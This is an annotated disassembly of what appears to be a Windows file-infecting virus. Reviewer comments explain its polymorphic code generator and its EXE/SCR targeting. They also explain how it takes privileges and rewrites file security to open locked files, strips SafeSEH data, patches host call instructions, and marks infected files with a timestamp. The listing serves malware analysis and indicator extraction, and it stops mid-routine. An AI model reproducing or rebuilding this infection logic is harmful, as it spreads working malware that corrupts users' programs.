        test   dword ptr [ebp+1039B0h], 2000003h
        jz     short loc_31432D4B
        test   dword ptr [ebp+1039B0h], 8000000h
        jnz    short loc_31432D4B
        test   dword ptr [ebp+1039B0h], 6000000h
        jnz    short loc_31432D41
        call   sub_314326EB
        call   sub_3143275D

loc_31432D41:                                  ; CODE XREF: UPX2:31432D35j
        call   sub_31432717
        call   sub_3143275D

loc_31432D4B:                                  ; CODE XREF: UPX2:31432D1Dj
                                               ; UPX2:31432D29j
        test   dword ptr [ebp+1039B0h], 10000000h
        jz     short loc_31432D5F
        mov    al, 0C9h                        ; C9h = leave
        stosb
        call   sub_3143275D

loc_31432D5F:                                  ; CODE XREF: UPX2:31432D55j
        test   dword ptr [ebp+1039B0h], 400000h ; same bit that appended 60h at the top
        jz     short loc_31432D95
        mov    al, 7                           ; builds 89 (44h | r<<3) 24 ((7-r)*4):
        sub    al, [ebp+1039A8h]               ; mov [esp+(7-r)*4], reg -- presumably
        shl    eax, 1Ah                        ; the register's slot in the pusha frame
        or     eax, 240889h
        add    ah, [ebp+1039A8h]
        shl    ah, 3
        add    ah, 4
        stosd
        call   sub_3143275D
        mov    al, 61h                         ; 61h = popa
        stosb
        call   sub_3143275D

loc_31432D95:                                  ; CODE XREF: UPX2:31432D69j
        mov    ax, 0E0FFh                      ; FF E0|r = jmp reg
        or     ah, [ebp+1039A8h]
        stosw
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 20h
        jz     short loc_31432E21
        test   dword ptr [ebp+1039B0h], 80000000h
        jz     short loc_31432DDD
        mov    eax, edi
        mov    ecx, [ebp+1042E0h]
        sub    eax, ecx
        mov    [ecx-4], eax                    ; back-patch the rel32 of the E8 stored above
        call   sub_314327CF                    ; out-of-line copy of the transform bytes
        call   sub_3143275D
        mov    al, 0C3h                        ; C3h = ret
        stosb
        call   sub_3143275D

loc_31432DDD:                                  ; CODE XREF: UPX2:31432DBCj
        mov    eax, edi
        mov    ecx, [ebp+1042B4h]
        sub    eax, ecx
        mov    [ecx-4], eax                    ; back-patch the dword before [ebp+1042B4h]
        mov    al, 58h                         ; 58h | r = pop reg
        or     al, [ebp+1039A8h]
        stosb
        call   sub_3143275D
        test   dword ptr [ebp+1039B0h], 800000h
        jz     short loc_31432E10
        mov    ax, 0C350h                      ; (50h | r) C3 = push reg / ret
        or     al, [ebp+1039A8h]
        jmp    short loc_31432E1A
; ---------------------------------------------------------------------------

loc_31432E10:                                  ; CODE XREF: UPX2:31432E02j
        mov    ax, 0E0FFh                      ; FF E0|r = jmp reg
        or     ah, [ebp+1039A8h]

loc_31432E1A:                                  ; CODE XREF: UPX2:31432E0Ej
        stosw
        call   sub_3143275D

loc_31432E21:                                  ; CODE XREF: UPX2:31432DB0j
        test   dword ptr [ebp+1039B0h], 2000003h
        jz     short loc_31432E8C
        mov    ecx, edi
        mov    eax, [ebp+1042CCh]
        sub    ecx, eax
        mov    [eax-4], ecx                    ; back-patch the dword before [ebp+1042CCh]
        xor    ecx, ecx
        test   dword ptr [ebp+1039B0h], 1000000h
        jnz    short loc_31432E56
        lea    eax, [ebp+1039A8h]

loc_31432E4E:                                  ; CODE XREF: UPX2:31432E54j
        mov    cl, [eax]                       ; first byte from [ebp+1039A8h] on that is
        inc    eax                             ; below 3. NOTE(review): no upper bound on
        cmp    cl, 3                           ; this scan is visible; it relies on such a
        jnb    short loc_31432E4E              ; byte existing

loc_31432E56:                                  ; CODE XREF: UPX2:31432E46j
        lea    eax, ds:102444h[ecx*8]          ; builds 8B (44h | r<<3) 24 10:
        shl    eax, 8                          ; mov reg, [esp+10h]
        mov    al, 8Bh
        stosd
        jecxz  short loc_31432E6B
        mov    ax, 0C031h                      ; 31 C0 = xor eax, eax
        stosw

loc_31432E6B:                                  ; CODE XREF: UPX2:31432E63j
        mov    ax, 808Fh                       ; 8F (80h + r) disp32 = pop [reg+disp32]
        push   0B8h
        add    ah, cl
        stosw
        pop    eax
        stosd                                  ; disp32 = 0B8h
        test   ecx, ecx
        jnz    short loc_31432E84
        mov    ax, 0C031h                      ; 31 C0 = xor eax, eax
        stosw

loc_31432E84:                                  ; CODE XREF: UPX2:31432E7Cj
        mov    al, 0C3h                        ; C3h = ret
        stosb
        call   sub_3143275D

; Finalisation: compute the generated length and store one dword through the
; pointer kept in [ebp+1042B8h].
loc_31432E8C:                                  ; CODE XREF: UPX2:31432E2Bj
        lea    eax, [ebp+1039BCh]
        test   dword ptr [ebp+1039B0h], 20000000h
        jnz    short loc_31432EA4
        push   edi
        sub    edi, eax                        ; edi = bytes generated
        pop    eax                             ; eax = end pointer
        jmp    short loc_31432EBD
; ---------------------------------------------------------------------------

loc_31432EA4:                                  ; CODE XREF: UPX2:31432E9Cj
        mov    edx, [ebx+28h]
        sub    edi, eax                        ; edi = bytes generated
        sub    edx, eax
        mov    ecx, [ebp+1042D4h]
        add    [ebp+1042B4h], edx
        add    [ecx], edi                      ; add the length to the imm32 stored at
                                               ; loc_31432B44
        mov    eax, [esp+4]                    ; the routine's stack argument

loc_31432EBD:                                  ; CODE XREF: UPX2:31432EA2j
        mov    [ebp+101069h], edi              ; length saved for later use
        mov    edi, [ebp+1042B8h]
        sub    eax, [ebp+1042B4h]
        test   dword ptr [ebp+1039B0h], 40h
        jz     short loc_31432EDD
        neg    eax

loc_31432EDD:                                  ; CODE XREF: UPX2:31432ED9j
        stosd
        retn   4

; =============== S U B R O U T I N E =======================================

; sub_31432EE1 -- only the opening instructions fall in this part of the
; listing, so only they are annotated.
; NOTE(review): the single-byte "instructions" after the call (dec ebx,
; inc ebp, push edx, dec esi, inc ebp, dec esp, xor esi,[edx], db 2Eh,
; inc esp, dec esp, dec esp) are the byte values 4B 45 52 4E 45 4C 33 32 2E
; 44 4C 4C, i.e. the ASCII text "KERNEL32.DLL". The call targets
; loc_31432F01+1, just past them, so this is most likely an inline string
; whose address the call leaves on the stack, not code that executes.
sub_31432EE1 proc near                         ; CODE XREF: sub_3143344B+336p
        push   esi
        push   edi
        cmp    dword ptr [ebp+1042F0h], 0
        jz     loc_314330C9
        call   near ptr loc_31432F01+1
        dec    ebx
        inc    ebp
        push   edx
        dec    esi
        inc    ebp
        dec    esp
        xor    esi, [edx]
        db 2Eh
        inc    esp
        dec    esp
        dec    esp

loc_31432F01: ; CODE
XREF: sub_31432EE1+Fp add bh, bh sub_31432EE1 endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al mov [ebp+104304h], eax push ebx mov ebx, [eax+3Ch] add ebx, eax push dword ptr [ebx+28h] mov eax, [ebx+34h] call sub_31432404 mov edx, [ebp+1042E4h] pop ebx add eax, [edx+0Ch] mov [ebp+104308h], eax add eax, [edx+8] mov [ebp+10430Ch], eax mov esi, [ebx+28h] push dword ptr [ebx+80h] call sub_31432404 mov edi, [ebp+1042E4h] push esi call sub_31432404 mov edx, [ebp+1042E4h] mov ecx, [edx+8] add ecx, [edx+0Ch] sub ecx, esi sub ecx, 5 js loc_314330C9 jz loc_314330C9 add esi, [ebp+1042E8h] add esi, [ebp+1042A4h] ; START OF FUNCTION CHUNK FOR sub_3143309A loc_31432F7B: ; CODE XREF: sub_3143309A+29j lodsb cmp al, 0E8h jnz loc_31433026 lea eax, [esi+4] sub eax, [ebp+1042A4h] add eax, [esi] push eax call sub_31432404 cmp dword ptr [ebp+1042E4h], 0 jnz short loc_31432FA9 cmp eax, [edi+0Ch] jnb loc_314330C2 jmp short loc_31432FB5 ; --------------------------------------------------------------------------- loc_31432FA9: ; CODE XREF: sub_3143309A-FEj cmp [ebp+1042E4h], edx jnz loc_314330C2 loc_31432FB5: ; CODE XREF: sub_3143309A-F3j add eax, [ebp+1042A4h] cmp word ptr [eax], 25FFh jnz loc_314330C2 mov eax, [eax+2] sub eax, [ebx+34h] push eax call sub_31432404 cmp [ebp+1042E4h], edi jnz loc_314330C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov eax, [eax] sub eax, [edi+0Ch] jb loc_314330C2 cmp eax, [edi+8] jnb loc_314330C2 loc_31432FFE: ; CODE XREF: sub_3143309A+22j add eax, 2 add eax, [edi+14h] add eax, [ebp+1042A4h] push edx push eax push dword ptr [ebp+104304h] call dword ptr [ebp+103E5Eh] pop edx test eax, eax jnz loc_314330D8 jmp loc_314330C2 ; --------------------------------------------------------------------------- loc_31433026: ; CODE XREF: sub_3143309A-11Cj cmp al, 0FFh jnz loc_314330C2 cmp byte ptr [esi], 15h jnz loc_314330C2 mov eax, [esi+1] sub eax, [ebx+34h] push eax call sub_31432404 cmp [ebp+1042E4h], edi jnz short loc_314330C2 add eax, 
[ebp+1042E8h] add eax, [ebp+1042A4h] mov [ebp+104310h], eax mov eax, [eax] cmp eax, [ebp+104308h] jb short loc_3143306F cmp eax, [ebp+10430Ch] jb short loc_314330D8 loc_3143306F: ; CODE XREF: sub_3143309A-35j cmp eax, 70000000h jb short loc_314330AD call sub_3143309A lea ecx, [esi-4] mov eax, ecx sub eax, [edx] add eax, [edx+10h] cmp eax, [ebp+104310h] jnz short locret_31433099 add esp, 10h push dword ptr [ecx] pop [esp-0Ch+arg_24] popa jmp short loc_314330B4 ; --------------------------------------------------------------------------- locret_31433099: ; CODE XREF: sub_3143309A-Fj retn ; END OF FUNCTION CHUNK FOR sub_3143309A ; =============== S U B R O U T I N E ======================================= sub_3143309A proc near ; CODE XREF: sub_3143309A-24p var_8 = dword ptr -8 arg_0 = dword ptr 4 arg_24 = dword ptr 28h ; FUNCTION CHUNK AT 31432F7B SIZE 0000011F BYTES pop dword ptr [ebp+1042C4h] pusha mov esi, [ebp+1042A4h] call sub_3143250B popa loc_314330AD: ; CODE XREF: sub_3143309A-26j test eax, 80000000h jnz short loc_314330C2 loc_314330B4: ; CODE XREF: sub_3143309A-3j sub eax, [edi+0Ch] jb short loc_314330C2 cmp eax, [edi+8] jb loc_31432FFE loc_314330C2: ; CODE XREF: sub_3143309A-F9j ; sub_3143309A-EBj ... dec ecx jnz loc_31432F7B loc_314330C9: ; CODE XREF: sub_31432EE1+9j ; UPX2:31432F63j ... 
; Tail of sub_3143309A (its head is earlier in the listing).
; Failure exit: clear bit 22 (400000h) in the flag dword at [edi+29B0h] and
; return without patching anything.
        mov edi, [esp-4+arg_0]
        and dword ptr [edi+29B0h], 0FFBFFFFFh
        jmp short loc_3143311A
; ---------------------------------------------------------------------------
; Patch path. esi points one byte past the start of the host instruction the
; scan selected. The 6 bytes at that instruction are saved to [ecx+29B4h] and
; the instruction is overwritten in the mapped file with E8 <rel32>.
; edx is used as a section-header pointer (offsets 0Ch, 14h, 24h); it is set by
; code outside this span - TODO confirm which section it describes.
loc_314330D8: ; CODE XREF: sub_3143309A-7Fj
              ; sub_3143309A-2Dj
        or dword ptr [edx+24h], 0E0000060h ; section flags |= code, initialized data, execute, read, write
        dec esi ; back to the first byte of the selected instruction
        xor eax, eax
        mov ecx, [esp+8+var_8]
        xchg eax, [ebp+1042F0h] ; fetch the stored target value and zero the slot
        mov [ebp+1042ECh], eax
        lea edi, [ecx+29B4h]
        add eax, [ebp+1042A4h]
        movsw
        movsd ; 2 + 4 = 6 original bytes saved
        dec esi ; esi = instruction start + 5
        sub eax, esi
        add eax, [edx+14h]
        sub eax, [edx+0Ch]
        mov byte ptr [esi-5], 0E8h ; opcode of a near relative call
        mov dword ptr [ecx+54h], 5
        mov [esi-4], eax ; rel32 operand of the patched call
loc_3143311A: ; CODE XREF: sub_3143309A+3Cj
        pop edi
        pop esi
        retn
sub_3143309A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; sub_3143311D is called by the file filter after a first sub_31433249 (open
; and map) attempt fails. From the visible argument patterns it appears to
; enable token privileges and then change the owner and DACL of the target
; file so that the second open attempt succeeds. API identities below are
; inferred from name strings and call shapes, not from symbols - confirm in a
; debugger. The strings embedded here (SeRestorePrivilege, SeBackupPrivilege,
; SeChangeNotifyPrivilege) are usable as static indicators for this sample.
sub_3143311D proc near ; CODE XREF: UPX2:3143341Ep
; FUNCTION CHUNK AT 31433247 SIZE 00000002 BYTES
        push edi
        call dword ptr [ebp+103EAAh] ; slot 16 of the table filled by sub_3143958C; the name list decodes to GetVersion at that index
        shr eax, 1Fh ; keep only the top bit of the result
        jnz loc_31433247 ; top bit set: skip the whole routine
        push eax ; eax is 0 here: output slot on the stack
        push esp ; pointer to that slot
        push 28h
        push 0FFFFFFFFh
        call dword ptr [ebp+103F0Ah] ; (-1, 28h, &slot): looks like an open-process-token call on the current process; name not visible here
        test eax, eax
        pop edi ; edi = value written to the slot (presumably a token handle)
        js loc_31433247 ; negative result treated as failure (NTSTATUS-style check)
        call sub_3143159F
; From "push ebx" to the 00 byte inside loc_31433158 the bytes are ASCII data
; that IDA disassembled as instructions. The call above them only pushes the
; string address. Decoded by hand the 16 characters read "SetFileSecurityA"
; (reviewer's decoding - confirm in a hex view).
        call near ptr loc_31433158+5
        push ebx
        db 65h
        jz short near ptr unk_31433196
        imul ebp, [ebp+53h], 72756365h
loc_31433158: ; CODE XREF: sub_3143311D+2Ap
        imul esi, [ecx+edi*2+41h], 78B5FF00h
sub_3143311D endp ; sp-analysis failed
; The tail of the imul above plus the next two lines are really
; FF B5 78 42 10 00 = push dword ptr [ebp+104278h] (a module handle stored by
; sub_3143159F's twin sub_3143959F).
        inc edx
        adc [eax], al
        call dword ptr [ebp+103E5Eh] ; export-lookup pointer (stored from esi in sub_3143917E); takes (module, name)
        mov [ebp+104280h], eax ; resolved pointer, called twice at loc_314331F3
; Second embedded string, same call-over-data trick: the 24 bytes up to the 00
; at loc_3143318C decode to "SeTakeOwnershipPrivilege" (hand-decoded).
        call near ptr loc_3143318C+1
        push ebx
        db 65h
        push esp
        popa
        imul esp, [ebp+4Fh], 77h
        outsb
        db 65h
        jb short loc_314331F3
        push 72507069h
        imul esi, [esi+69h], 6567656Ch
loc_3143318C: ; CODE XREF: UPX2:3143316Fp
; Bytes 00 57 E8 2B E8 FF FF: string terminator, push edi, call rel32 to a
; helper earlier in the image (not shown) - presumably the privilege enabler.
        add [edi-18h], dl
        sub eax, ebp
; ---------------------------------------------------------------------------
        db 0FFh
        db 0FFh
; E8 13 00 00 00 = call over the next 13h bytes, pushing the string address.
        db 0E8h ;
        db 13h
        db 0
unk_31433196 db 0 ; CODE XREF: sub_3143311D+30j
        db 0
; "SeRestorePrivilege",0
        db 53h ; S
        db 65h ; e
        db 52h ; R
        db 65h ; e
        db 73h ; s
        db 74h ; t
        db 6Fh ; o
        db 72h ; r
        db 65h ; e
        db 50h ; P
        db 72h ; r
        db 69h ; i
        db 76h ; v
        db 69h ; i
        db 6Ch ; l
        db 65h ; e
        db 67h ; g
        db 65h ; e
        db 0
; 57 = push edi, then E8 rel32 = call to the same earlier helper.
        db 57h ; W
        db 0E8h ;
        db 0Bh
        db 0E8h ;
        db 0FFh
        db 0FFh
; E8 12 00 00 00 = call over the next 12h bytes.
        db 0E8h ;
        db 12h
        db 0
        db 0
        db 0
; "SeBackupPrivilege",0
        db 53h ; S
        db 65h ; e
        db 42h ; B
        db 61h ; a
        db 63h ; c
        db 6Bh ; k
        db 75h ; u
        db 70h ; p
        db 50h ; P
        db 72h ; r
        db 69h ; i
        db 76h ; v
        db 69h ; i
        db 6Ch ; l
        db 65h ; e
        db 67h ; g
        db 65h ; e
        db 0
; push edi / call helper again.
        db 57h ; W
        db 0E8h ;
        db 0EEh ;
        db 0E7h ;
        db 0FFh
        db 0FFh
; E8 18 00 00 00 = call over the next 18h bytes.
        db 0E8h ;
        db 18h
        db 0
        db 0
        db 0
; "SeChangeNotifyPrivilege",0
        db 53h ; S
        db 65h ; e
        db 43h ; C
        db 68h ; h
        db 61h ; a
        db 6Eh ; n
        db 67h ; g
        db 65h ; e
        db 4Eh ; N
        db 6Fh ; o
        db 74h ; t
        db 69h ; i
        db 66h ; f
        db 79h ; y
        db 50h ; P
        db 72h ; r
        db 69h ; i
        db 76h ; v
        db 69h ; i
        db 6Ch ; l
        db 65h ; e
        db 67h ; g
        db 65h ; e
        db 0
; push edi / call helper, then 50 54 = push eax, push esp (arguments for the
; call at loc_314331F3).
        db 57h ; W
        db 0E8h ;
        db 0CBh ;
        db 0E7h ;
        db 0FFh
        db 0FFh
        db 50h ; P
        db 54h ; T
; ---------------------------------------------------------------------------
; Query 64h bytes of class-1 information about the handle in edi into the
; buffer at [ebp+103DBCh] (shape matches a token-information query for the
; token user; name not visible here), then close the handle.
loc_314331F3: ; CODE XREF: UPX2:3143317Dj
        lea eax, [ebp+103DBCh]
        push 64h
        push eax
        push 1
        push edi
        call dword ptr [ebp+103F16h]
        mov [esp], edi
        call dword ptr [ebp+103E52h] ; pointer resolved in the loader from a name that decodes to CloseHandle
        sub al, al
        lea edi, [ebp+104174h] ; upper-cased path of the target file
; Build a 5-dword structure on the stack: 40001h, the first dword of the
; queried buffer, then three values of eax (its low byte was just zeroed).
; Read as a SECURITY_DESCRIPTOR this is revision 1, control 4 (DACL present),
; owner = queried SID, and a NULL DACL - NOTE(review): interpretation, confirm.
        push eax
        push eax
        push eax
        push dword ptr [ebp+103DBCh]
        push 40001h
        push esp
        push 1 ; selector 1: owner, if the pointer is SetFileSecurityA
        push edi
        call dword ptr [ebp+104280h]
        push esp
        push 4 ; selector 4: DACL, if the pointer is SetFileSecurityA
        push edi
        call dword ptr [ebp+104280h]
        add esp, 14h ; drop the 5-dword structure
        push dword ptr [ebp+104278h]
        call dword ptr [ebp+103E8Eh] ; slot 9 of the sub_3143958C table; the name list decodes to FreeLibrary at that index
; START OF FUNCTION CHUNK FOR sub_3143311D
loc_31433247: ; CODE XREF: sub_3143311D+Aj
              ; sub_3143311D+1Fj
        pop edi
        retn
; END OF FUNCTION CHUNK FOR sub_3143311D
; =============== S U B R O U T I N E =======================================
sub_31433249 proc near ; CODE XREF: UPX2:31433417p
                       ; UPX2:31433423p ...
; Body of sub_31433249: open the file whose path is at [ebp+104174h] and map
; it for writing.
; In:  ebp = position-independent base, ebx = bytes to add to the mapping size.
; Out: ZF clear on success with the view base in [ebp+1042A4h]; ZF set on
;      failure. Failure jumps land in the cleanup tail of sub_3143384E.
; The calls go through a pointer table that sub_3143958C fills from a name
; list; API names below follow the order of that list where it is visible in
; this listing and are otherwise guessed from the argument pattern - confirm.
        lea esi, [ebp+104174h]
        push esi
        call dword ptr [ebp+103E92h] ; table slot 10: GetFileAttributesA by list order
        cmp eax, 0FFFFFFFFh
        jz locret_3143331A
        mov [ebp+104284h], eax ; original attributes, restored during cleanup
        push 0
        push esi
        call dword ptr [ebp+103ECEh] ; (path, 0): presumably clears the file attributes; name not visible here
        test eax, eax
        jz locret_3143331A
        sub eax, eax
        push eax
        push eax
        push 3
        push eax
        push 1
        push 0C0000000h
        push esi
        call dword ptr [ebp+103E6Eh] ; table slot 1: CreateFileA by list order; 0C0000000h = read+write access, 3 = open existing
        cmp eax, 0FFFFFFFFh
        jz loc_3143389B
        mov [ebp+104288h], eax ; file handle
        lea ecx, [ebp+10428Ch]
        lea edx, [ebp+104294h]
        push ecx
        push edx
        push 0
        push eax
        call dword ptr [ebp+103E9Ah] ; table slot 12: GetFileTime by list order; two timestamps saved at 104294h and 10428Ch
        cmp eax, 0FFFFFFFFh
        jz loc_3143388F
        push 0
        push dword ptr [ebp+104288h]
        call dword ptr [ebp+103E96h] ; table slot 11: GetFileSize by list order
        cmp eax, 0FFFFFFFFh
        jz loc_3143388F
        mov [ebp+10429Ch], eax ; original file size
        xor ecx, ecx
        add eax, ebx ; mapping size = file size + caller-supplied growth
        push ecx
        push eax
        push ecx
        push 4
        push ecx
        push dword ptr [ebp+104288h]
        call dword ptr [ebp+103E72h] ; table slot 2: CreateFileMappingA by list order; 4 = read/write page protection
        test eax, eax
        jz loc_3143388F
        xor ecx, ecx
        mov [ebp+1042A0h], eax ; mapping handle
        push ecx
        push ecx
        push ecx
        push 0F001Fh
        push eax
        call dword ptr [ebp+103EBAh] ; (mapping, 0F001Fh, 0, 0, 0): matches a map-view call with full access; name not visible here
        test eax, eax
        jz loc_31433867
        mov [ebp+1042A4h], eax ; base of the mapped view
locret_3143331A: ; CODE XREF: sub_31433249+10j
                 ; sub_31433249+27j ...
; End of sub_31433249 (shared return label locret_3143331A precedes this line).
        retn
sub_31433249 endp
; ---------------------------------------------------------------------------
; loc_3143331B: compute two rounded sizes from the PE header at ebx.
;   [ebp+1042B0h] = 7317h (+ [ebp+101069h] unless flag 20000000h is set),
;                   rounded with the alignment at [ebx+38h]
;   [ebp+1042A8h] = 29BBh + [ebp+101069h], rounded with the alignment at [ebx+3Ch]
; In a PE32 header offsets 38h and 3Ch are SectionAlignment and FileAlignment.
; Rounding is (x + a) / a * a. There is no check that the alignment is
; non-zero, so a malformed header faults in div.
loc_3143331B: ; CODE XREF: sub_3143344B+188p
              ; sub_3143344B+2A0p
        mov eax, 7317h
        mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
; IDA left the next instruction as raw bytes. F7 85 B0 39 10 00 00 00 00 plus
; the 20h that begins the following "and" decode as
;   test dword ptr [ebp+1039B0h], 20000000h
; and the 75 06 after it is a jnz over the 6-byte "add eax, [ebp+101069h]".
; The "and [ebp+6], dh" line is therefore a disassembly artifact.
        db 0F7h ;
        db 85h ;
        db 0B0h ;
        db 39h ; 9
        db 10h
        db 0
        db 0
        db 0
        db 0
; ---------------------------------------------------------------------------
        and [ebp+6], dh
        add eax, [ebp+101069h]
        xor edx, edx ; clear the high half of the dividend
        add eax, ecx
        div ecx
        mul ecx
        mov [ebp+1042B0h], eax
        mov eax, 29BBh
        mov ecx, [ebx+3Ch]
        add eax, [ebp+101069h]
        xor edx, edx
        add eax, ecx
        div ecx
        mul ecx
        mov [ebp+1042A8h], eax
        retn
; =============== S U B R O U T I N E =======================================
; sub_31433360: pick the section header to extend and sanity-check the file.
; In:  ebx = PE header, [ebp+10429Ch] = file size.
; Out: edx = section header examined last; CF set means "do not touch this
;      file" (both callers test it with jb).
; Headers are walked from the last one backwards ([ebx+6] = section count,
; [ebx+14h] = optional-header size, 28h bytes per header). CF is set when the
; count runs out, when a section name starts with "_win" (6E69775Fh), or when
; the end of the chosen section's raw data, rounded up with [ebx+3Ch], is
; below the file size (that is, data follows the last section).
sub_31433360 proc near ; CODE XREF: sub_3143344B:loc_314334C0p
                       ; sub_3143344B+1B4p
        movzx ecx, word ptr [ebx+6]
        stc
loc_31433365: ; CODE XREF: sub_31433360+23j
        jecxz short locret_3143339C
        lea edx, [ebx+18h]
        movzx eax, word ptr [ebx+14h]
        add edx, eax
        dec ecx
        imul eax, ecx, 28h
        add edx, eax ; edx = header of section number ecx
        cmp dword ptr [edx], 6E69775Fh ; "_win"
        stc
        jz short locret_3143339C
        cmp dword ptr [edx+0Ch], 1
        jb short loc_31433365 ; field at +0Ch is zero: try the previous header
        mov ecx, [ebx+3Ch]
        mov eax, [edx+14h]
        add eax, [edx+10h] ; raw offset + raw size
        lea eax, [eax+ecx*2-1]
        neg ecx
        and eax, ecx ; rounded with the [ebx+3Ch] alignment (assumes a power of two)
        cmp eax, [ebp+10429Ch] ; CF = rounded end below the file size
locret_3143339C: ; CODE XREF: sub_31433360:loc_31433365j
                 ; sub_31433360+1Dj ...
; End of sub_31433360 (shared return label locret_3143339C precedes this line).
        retn
sub_31433360 endp
; =============== S U B R O U T I N E =======================================
; sub_3143339D is the exception handler that sub_3143344B installs. It is
; reached by return address, not by a normal call: the "call sub_3143339D"
; that follows "call sub_3143344B" exists only so that its address sits above
; the saved fs:[0] value and its own return address becomes the resume point.
; [esp+10h] is the third handler argument. Offset 0B8h is Eip in an x86
; CONTEXT, so the faulting thread resumes at the "call $+5" below; eax = 0
; tells the dispatcher to continue execution.
sub_3143339D proc near ; CODE XREF: UPX2:31433435p
arg_C = dword ptr 10h
        mov edx, [esp+arg_C]
        xor eax, eax
        pop dword ptr [edx+0B8h]
        retn
sub_3143339D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; File filter. The entry is the "lea edi" below (reached from outside this
; span); esi is the caller's path string - presumably a file name found by a
; scan, TODO confirm. The path is copied upper-cased to [ebp+104174h] while
; ebx tracks the character after the last "\" and ecx the character after the
; last "." of the current component.
loc_314333AA: ; CODE XREF: UPX2:314333CBj
        mov ecx, edi
        jmp short loc_314333B9
; ---------------------------------------------------------------------------
        lea edi, [ebp+104174h]
        cld
loc_314333B5: ; CODE XREF: UPX2:314333C7j
        mov ebx, edi
        xor ecx, ecx
loc_314333B9: ; CODE XREF: UPX2:314333ACj
              ; UPX2:314333CFj
        lodsb
        cmp al, 61h
        jb short loc_314333C4
        cmp al, 7Ah
        ja short loc_314333C4
        sub al, 20h ; a-z -> A-Z
loc_314333C4: ; CODE XREF: UPX2:314333BCj
              ; UPX2:314333C0j
        stosb
        cmp al, 5Ch
        jz short loc_314333B5
        cmp al, 2Eh
        jz short loc_314333AA
        cmp al, 0
        jnz short loc_314333B9
        jecxz short locret_3143339C ; no extension: ignore the file
; Only extensions "EXE" and "SCR" (with the terminating NUL) are accepted.
        mov eax, [ecx]
        cmp eax, 455845h
        jz short loc_314333E7
        cmp eax, 524353h
        jnz locret_3143331A
; File names beginning "WINC", "WCUN", "WC32" or "PSTO" are skipped.
loc_314333E7: ; CODE XREF: UPX2:314333DAj
        mov eax, [ebx]
        cmp eax, 434E4957h
        jz locret_3143331A
        cmp eax, 4E554357h
        jz locret_3143331A
        cmp eax, 32334357h
        jz locret_3143331A
        cmp eax, 4F545350h
        jz locret_3143331A
        xor ebx, ebx ; first mapping: no extra size
        call sub_31433249
        jnz short loc_3143342E
        call sub_3143311D ; open failed: adjust privileges and file security, then retry once
        call sub_31433249
        jz locret_3143331A
loc_3143342E: ; CODE XREF: UPX2:3143341Cj
        xor edx, edx
        call sub_3143344B
        call sub_3143339D ; never executed in sequence; see the note on sub_3143339D
; Resume point after a fault: recompute the base in ebp (the handler does not
; preserve it) and go to the common exit.
        call $+5
        pop ebp
        sub ebp, 10343Fh
        jmp loc_31433845
; =============== S U B R O U T I N E =======================================
; sub_3143344B: validate the mapped file and modify it (continues well past
; this span). Called with edx = 0. The first three instructions link an
; exception registration record at fs:[0] whose handler field is this
; function's return address.
; A file is left alone unless it starts with "MZ", has a "PE" signature at
; the e_lfanew offset, does not have bit 2000h set in the dword at header
; +16h (the DLL bit of Characteristics), has bit 1 set in the byte at +5Ch
; (Subsystem values 2 and 3), and its TimeDateStamp at +8 is neither
; 0A0A0A0A0h nor 20202020h. This routine later writes 0A0A0A0A0h into that
; field under a flag, so the stamp serves as an already-processed marker and
; is a cheap triage indicator.
sub_3143344B proc near ; CODE XREF: UPX2:31433430p
var_14 = dword ptr -14h
        push dword ptr fs:[edx]
        mov esi, [ebp+1042A4h]
        mov fs:[edx], esp
        cmp word ptr [esi], 5A4Dh
        jnz loc_31433845
        mov ebx, [esi+3Ch]
        add ebx, esi
        cmp word ptr [ebx], 4550h
        jnz loc_31433845
        test dword ptr [ebx+16h], 2000h
        jnz loc_31433845
        test byte ptr [ebx+5Ch], 2
        jz loc_31433845
        mov eax, [ebx+8]
        cmp eax, 0A0A0A0A0h
        jz loc_31433845
        cmp eax, 20202020h
        jz loc_31433845
; Header offset 0C8h is the RVA slot of data directory 10 (load configuration)
; in a PE32 image. If present, the dwords at +40h and +44h of that structure
; are zeroed; in the 32-bit load-config layout those are SEHandlerTable and
; SEHandlerCount, so the host loses its SafeSEH table. sub_31432404 is not in
; this span; it appears to translate the RVA and leave a delta in
; [ebp+1042E8h] - TODO confirm.
        mov ecx, [ebx+0C8h]
        jecxz short loc_314334C0
        push ecx
        call sub_31432404
        add ecx, [ebp+1042E8h]
        add ecx, esi
        and dword ptr [ecx+40h], 0
        and dword ptr [ecx+44h], 0
loc_314334C0: ; CODE XREF: sub_3143344B+5Dj
        call sub_31433360
        jb loc_31433845
        and dword ptr [ebp+1042ECh], 0
; [ebp+1042ACh] = max(0, [edx+8] - [edx+10h]); when positive, the field at
; +10h is raised to the value at +8 (virtual size and raw size in a section
; header).
        mov eax, [edx+8]
        mov ecx, [edx+10h]
        sub eax, ecx
        jnb short loc_314334E0
        xor eax, eax
        jmp short loc_314334E5
; ---------------------------------------------------------------------------
loc_314334E0: ; CODE XREF: sub_3143344B+8Fj
        add ecx, eax
        mov [edx+10h], ecx
loc_314334E5: ; CODE XREF: sub_3143344B+93j
        mov [ebp+1042ACh], eax
        add ecx, [edx+0Ch]
        mov eax, 10000h
        push ecx
; The helper at dword_31431B40+43h lies in a region IDA typed as data and is
; not shown. It takes a bound in eax and its result is read from edx -
; presumably a bounded pseudo-random number.
        call near ptr dword_31431B40+43h
        xor [ebp+1039AEh], dl
        mov cl, 20h
        xor [ebp+1039AFh], dh
; Toggle each of the 32 bits of the option dword at [ebp+1039B0h] according
; to whether a helper call with bound 20h returns zero.
loc_31433507: ; CODE XREF: sub_3143344B+D5j
        push 20h
        dec cl
        pop eax
        js short loc_31433522
        call near ptr dword_31431B40+43h
        test edx, edx
        setz dl
        shl edx, cl
        xor [ebp+1039B0h], edx
        jmp short loc_31433507
; ---------------------------------------------------------------------------
; Make the option bits consistent: with 2000000h set, clear 8000000h when the
; low two bits are both clear, otherwise set 10000000h.
loc_31433522: ; CODE XREF: sub_3143344B+C1j
        test dword ptr [ebp+1039B0h], 2000000h
        jz short loc_31433550
        test dword ptr [ebp+1039B0h], 3
        jnz short loc_31433546
        and dword ptr [ebp+1039B0h], 0F7FFFFFFh
        jmp short loc_31433550
; ---------------------------------------------------------------------------
loc_31433546: ; CODE XREF: sub_3143344B+EDj
        or dword ptr [ebp+1039B0h], 10000000h
loc_31433550: ; CODE XREF: sub_3143344B+E1j
              ; sub_3143344B+F9j ...
; Continuation of sub_3143344B at loc_31433550.
